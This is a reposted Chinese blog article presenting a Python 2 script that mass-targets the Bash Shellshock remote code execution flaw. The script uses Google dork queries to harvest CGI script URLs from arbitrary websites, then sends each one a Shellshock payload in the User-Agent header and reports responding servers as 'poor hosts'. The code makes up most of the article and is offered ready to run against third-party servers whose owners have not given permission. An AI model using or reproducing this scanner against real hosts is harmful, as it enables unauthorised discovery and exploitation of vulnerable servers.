Bash Shellshock(Bash遠程代碼執行)漏洞批量利用腳本

jopen 11年前發布 | 34K 次閱讀 Linux Shellshock

Bash遠程代碼執行漏洞的威力確實要比心臟滴血大很多,但是影響范圍不是很廣泛,不過昨天的分析文章Bash遠程代碼執行漏洞分析中末尾提到了這個漏洞的批量問題。
其中最最簡單的方法就是使用搜索引擎的hacking技術,這里我使用的Google Hacking語法結合Google API來進行鏈接的抓取。只不過在國內的話。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何檢測漏洞思路也很簡單,我這里直接根據服務器返回碼進行判斷的。

思路就是以上這些,下面還是和往常一樣,貼代碼:

    #coding=utf-8  
    import requests  
    import json  
    import sys  
    import threading  
    import socket  
    vul_res = []  
    class GoogleURLProvider():  
        def __init__(self,pageCount,proxies):  
            self.pageCount = pageCount #查詢的頁數  
            self.keywords = r'inurl:cgi-bin filetype:sh'  
            self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"  
            self.proxies = proxies  
        def getRequest(self,url):  
            return requests.get(url,proxies=self.proxies,verify=False)  

        def getUrls(self):  
            ret_list = []  
            tmp_list = []  
            for x in xrange(0,self.pageCount):  
                url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)  
                try:  
                    r = self.getRequest(url)      
                    results = json.loads(r.text)  
                    if not results:  
                        continue  
                    infos = results['responseData']['results']  
                    if infos:  
                        for i in infos:  
                            tmp_list.append(i['url'])  
                except Exception, e:  
                    continue  
            ret_list = ret_list + tmp_list  
            return ret_list  

    class BashRCEDetector():  
        def __init__(self,urls):  

            self.urls = urls  
        def detector(self):  
            global vul_res  

            for x in self.urls:  
                #多線程執行  
                each = EachWorker(x)  
                each.start()  
                each.join()  


    '''''線程工作類'''  
    class EachWorker(threading.Thread):  
        def __init__(self,url):  
            threading.Thread.__init__(self)  
            self.url = url  
        def run(self):  
            global vul_res  
            useragent_header = {  
                'User-Agent':'''''() { 1;}; echo 'eee'''  
            }  
            try:  
                r = requests.get(self.url,headers = useragent_header,timeout=8)  
                if r.status_code == 500:  
                    print "{url} has Bash RCE vulnerability".format(url=self.url)  
                    vul_res.append(self.url)  
                else:  
                    pass  
            except socket.timeout, e:  
                pass  
            except requests.exceptions.Timeout, e:  
                pass  
            except requests.exceptions.ConnectionError, e:  
                pass  


    if __name__ == '__main__':  
        print 'Powered by:Exploit QQ:739858341'  
        print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'  
        if len(sys.argv) != 2:  
            print 'Usage:python BashRCEScanner <google pageCount>'  
            sys.exit()  
        #goagent proxy  
        #在這里修改,加入你自己的代理即可使用  
        proxies = {  
        'http':"http://127.0.0.1:8087",  
        'https':"http://127.0.0.1:8087"  
        }  
        url_res = []  
        vul_guys = []  
        urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)  
        url_res = urlgetter.getUrls()  

        bash_detector = BashRCEDetector(url_res)  
        bash_detector.detector()  
        if len(vul_res) == 0:  
            print 'This group have no vulnerability'  
        else:  
            print 'Find %d poor host(s)' % len(vul_res)

運行截圖:

20140926112220982.gif

來自:http://blog.csdn.net/u011721501/article/details/39577393

 本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!